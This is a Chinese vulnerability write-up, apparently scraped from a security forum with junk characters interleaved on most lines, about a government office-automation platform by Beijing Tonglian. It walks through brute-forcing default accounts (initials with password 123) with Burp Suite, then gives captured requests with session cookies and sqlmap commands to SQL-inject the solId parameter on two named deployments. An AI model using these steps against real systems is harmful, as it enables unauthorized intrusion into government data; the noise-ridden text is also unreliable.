7 U6 G4 c X- f" A0 [9 m% L. H* b: K
1 h% C. f0 m4 c- w- {: E
( B I; k! ^" s9 H5 Z
0 B; V& c `6 }5 R/ U4 w( _ 平台简介:& ]& k: y8 S/ p* e% @% O
# ]. U# F1 n9 ]+ e2 w D5 f K" g) t1 s
F# f j. x' X9 s2 E 0 p9 L a6 R! l: {( {8 D0 K. C% W, I
$ M9 {+ C: b( _2 F6 M" G- [3 U; s
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 ) }5 \0 e m4 i& }7 b
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 \1 B5 _) t8 I# o! Q; F+ v同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!$ I- c; N" l M1 _
6 A# b- \; l! w8 y
: g4 L) W, ^. J
& g9 F- c4 }3 B
# u, [' f' m) Z5 k: A' D" H: v
1 k8 m* }- z" @% W O# d 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
5 @# n- G/ q: j& j5 \ " t0 A$ ~- p" A1 y7 l4 v
& e+ R" `, o e! U. ^
6 t" o$ P1 E7 u W6 b3 ? I0 `- R
: q! @% l h5 c" w' e4 H$ Y" M% c0 X! L- y" s
http://1.1.1.1:7197/cap-aco/#(案例2-). F3 E* p! ^% l/ p+ f) g
, ` V, }7 U8 p6 }2 `3 `
# D) R- E0 b, Z. r& e& O. ]- |4 b
http://www.XXOO.com (案例1-官网网站)
& o4 i4 I! w( u. a" n / J/ \$ N/ ^- x, \
) a; B' V; U+ i; K
- @, G; `+ H" E( Z* c! R0 W) g# n6 s
# i/ G0 P) }3 A& r7 s8 H8 d/ S8 k- i6 ~: a) D: S
漏洞详情:; @" i Q9 ~' {4 i9 r
1 v" J9 d9 ~7 p
0 D `! S* j7 H1 Y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
/ w0 ~' w1 f/ u- N
& r# t2 ]9 E4 _' I
0 m1 e5 W# h: d 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
7 s& A/ q# k8 ]! q& u& l) R+ ~ 2 H: \% @, }! S0 p
, K5 J4 h1 U, Q% z
7 c& ]& [5 N6 z, i) S( L( q3 d
: f3 Y- }- }; Q- r6 F; u' Y; |& I M# ?0 c3 D( v$ @
: m' R, d" w* M" K2 n# w1 R
_) P6 Z! R7 q3 @4 A' r/ e/ u2 {- ?% N
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:# V- c8 n, r& [) }
- v# f; o Z( r: ]/ f* G
5 e. C% F3 h3 j) \$ W* K* x% w
1、案例1-官方网站) T; U8 j0 z- k
& p0 [, o" N/ v2 f6 q
5 p; Q a; H, ?# j: Y GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1: F& H% I, T a( J G
3 e+ T$ N% u: i1 _* X+ U! n
$ H3 ?# m1 c6 y! f# [ Host: www.XXOO.com
- N: M3 b# t5 l, ~ - t5 |- K* W G* `( W S5 }+ c
1 d+ w) ~3 E! A
Proxy-Connection: Keep-Alive
* C, ?) Q8 D" A 9 g7 [% {1 O6 b; v' N7 W
, \5 z8 m0 H2 Y. Z7 V Accept: application/json, text/javascript, */*; q=0.01" i( k# U3 m/ V
1 v. k: R5 _ U6 M t$ A5 |
6 P$ A; f' J J' { Accept-Language: zh-CN D3 o, o8 b5 r' Z' _0 m
U( @$ }; w/ @& T
6 U, i) `3 \$ q9 l! g- P! g: y8 A Content-Type: application/json3 Q' v- w! B6 Q( a
$ [5 j' X9 ~. e+ a
4 m1 d+ [% c, k
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko) z# u, ~# ^, g1 \) f; e" C
+ j! J# d' G8 ~" Y& L1 S, \( o, K# T' H3 C, C# e+ B
X-Requested-With: XMLHttpRequest
6 A3 ]5 p' }6 p
9 T, j' F0 Z2 C
9 \8 S+ O @' w! o% q1 M) t/ x Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0021 e9 Z% S3 F- M G. U6 `
9 q/ v* y) N% [8 z0 Y! X" N2 P7 T! G+ w9 T! n* _
Accept-Encoding: gzip, deflate, sdch
. |& B. {! u X; H# v7 D 1 H$ o0 Y% A$ |- j
9 {5 ?; }5 ?- e; ^ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
5 l1 `; Q6 a7 e; V/ S2 M # s- e* p p5 L- h. _# o
4 D9 Y% }$ o `# P }+ z5 S 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:( ]! o* H5 T' j
) \& g# w9 D6 t$ K9 w4 R+ I- ?
4 ]0 n+ t, r0 z* ] * r- A5 K5 c, b% x' u6 [; {
$ X+ Z9 I% }' y6 Z
. ?3 a4 K- ^5 X V
9 A3 J+ ?9 u: q, k# Y
6 H/ z# m/ J+ ^, M& Z8 A1 j& c' y
3 E" ?+ w/ ^- A7 Z' R A; t
2 @% Q3 S' d# r1 B 9 W5 z1 E8 r0 _& ]2 n( X9 [5 S
F2 b3 N% n& N! X ' R0 C* T* W/ c7 t, \: x3 @ n
8 V0 k6 J" B4 \7 p8 t: X
" C2 J) \3 i' Z$ d: ?+ G8 \- U
# W3 D6 V" I% G
! \- R, i {# e6 v$ J: c0 V5 p) r* m% `
2、案例2-某天河云平台
3 b: s( Y. {2 ?/ h8 @3 ~2 C
2 v4 k: N* S3 |! b4 f: Q$ c0 @' o' M' ?$ n4 j) {5 y
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
; f2 G' t3 D: ?, O" K
8 d, F0 J0 F5 X0 ?) r: ?1 w/ F! y3 z$ F
Host: 1.1.1.:7197; y3 Y* `: s; @; y$ ?4 H4 r
e! c8 f2 Y; [* ~- l
$ h/ h- s7 v. }$ q9 q Accept: application/json, text/javascript, */*; q=0.01
, q6 m# Y ~( d' s ) |4 c: A, I. C
4 i8 f, ~7 o& ~ f9 F7 a& T5 c. T1 Z
X-Requested-With: XMLHttpRequest0 J% s3 _0 T5 ^1 h
/ C8 m: _; D) B; ~# g
- n z5 h: p& F) O User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
! Y. C! G# q5 I 9 j" e. w+ A* k1 V. p3 L1 R4 m
7 q# `9 c+ @) x' K3 A d Content-Type: application/json
6 ~$ M8 d4 N- S6 S1 d+ q# i8 ^8 O4 |
; q9 r) P4 H9 D, N
$ Z4 I | C: V3 { Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
m, q& g4 {- j4 L$ F- N
& Q2 p7 x/ B6 ^! a: t* c
* m" L" b6 P- Q# Q, { Accept-Language: zh-CN,zh;q=0.82 @. H1 Q4 C5 t% [3 Q) \
# X5 `% v6 u+ }. S% Q1 z2 j
* U0 U7 G5 D% t) H+ O3 s Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
; L; H) w& b/ V0 t0 H3 g 1 y/ m. b0 h1 G1 I
m( e4 B0 l, a) f) [ x7 `( _. h Connection: close& I- [! _7 w% n* L& m9 ^$ t. }
" G" S$ S! C& U- l
4 P# i# c3 e1 ~- y) k5 ?
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
( @& _; K0 a4 y) _0 r, `) f) ~' s 8 c8 Q) Q# x7 O" R0 [& O/ x
, z- ^8 B2 J B* T; L \2 g! F
! u) W9 v0 ]& g) X
/ t6 E3 M0 X. U! I; }5 X6 K& o
, p. F& O9 G" a; R) ` " T. J' i. y) {) e: s% ?+ x3 [+ V" ^
|